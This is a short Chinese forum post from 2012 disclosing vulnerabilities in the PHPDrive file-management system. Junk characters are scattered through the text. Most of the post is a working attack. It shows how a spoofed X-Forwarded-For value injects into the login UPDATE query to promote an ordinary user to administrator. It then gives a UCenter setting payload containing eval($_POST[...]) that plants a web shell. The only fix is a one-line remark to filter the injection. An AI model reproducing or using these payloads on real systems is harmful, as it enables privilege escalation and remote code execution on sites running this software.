PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等) {+ V+ s# g3 R7 V4 B# I. f
# j& L# ~. R" [, R7 J
includes/user.lib.php& |% \1 _! B* M5 I3 I/ x/ _
行87
, \( c( F2 S G3 N- b h function get_ip() {$ o0 P9 V1 }. d9 ]# D4 {
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.( [% k. D: L4 c) D8 W/ G
在用户注册与登录 处module/disk/account.lead.php0 ]# [! g$ f. Q3 K; W
198行 2 v+ |/ B% A9 F' o1 g1 {3 c! x6 N
//更新本次登录IP和时间
w" \- D! S& T/ \& u) i $db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生$ d3 {4 N }4 i3 ?6 C
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
1 |3 k& c7 [) ^% }- x' B0 j' q实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
4 z0 X. h. F7 P# a后台getshell:( D7 U! ~2 f0 o% t; y& g
在UCenter设置处,将UC数据库登录名填写为
6 M2 r4 \' P9 ~- A7 H7 \& U & h+ z1 f& Y, v4 l, w
root’);eval($_POST[DisKill]);?>/*
1 P, g2 W8 ]9 Q1 Y4 W" O可以得到一个shell,位置在 data/uc.data.php
* u* F( `# n3 X6 [
, Y$ o) I% F7 {) z+ U: Z: j修复:过滤注入
+ t; }3 t7 m5 G; D* D7 p8 e+ E
# r3 J/ W. Q7 }1 {. { |
发表于 2012-12-31 09:18:34
收藏
支持
反对